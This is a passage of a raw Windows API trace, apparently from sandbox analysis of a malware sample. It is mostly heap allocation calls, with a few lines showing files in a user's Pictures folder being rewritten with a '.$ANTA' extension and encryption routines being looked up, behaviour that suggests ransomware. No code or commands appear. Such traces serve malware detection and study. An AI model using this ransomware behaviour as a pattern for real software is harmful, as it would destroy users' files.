hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0090.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0090.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0090.370] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0090.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0090.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0090.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0090.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\wWIF_SR6x0w3shayx.jpg.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\wwif_sr6x0w3shayx.jpg.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0090.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0090.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0090.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0090.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0090.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0090.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.371] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0090.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0090.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0090.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0090.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0090.372] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0090.372] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0090.372] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0090.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0090.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0090.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0090.375] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0090.375] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0090.378] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x67bc, lpOverlapped=0x0) returned 1 [0090.379] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0090.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0090.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x167bc) returned 0x4516010 [0090.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0090.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0090.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0090.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x167bc) returned 0x452c7d8 [0090.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0090.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.385] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0090.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0090.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0090.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0090.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x167bc) returned 0x4516010 [0090.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0090.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0090.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0090.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.386] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0090.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0090.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0090.386] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0090.386] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0090.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0090.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x167bc) returned 0x4516010 [0090.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2330 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0090.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0090.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0090.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x167bc) returned 0x499a008 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0090.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0090.390] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0090.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0090.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0090.390] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0090.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0090.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0090.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0090.391] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0090.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0090.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0090.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0090.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0090.391] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0090.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0090.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0090.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0090.392] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0090.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0090.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0090.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0090.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0090.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0090.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0090.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0090.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0090.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0090.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0090.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.393] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0090.393] RtlAllocateHeap 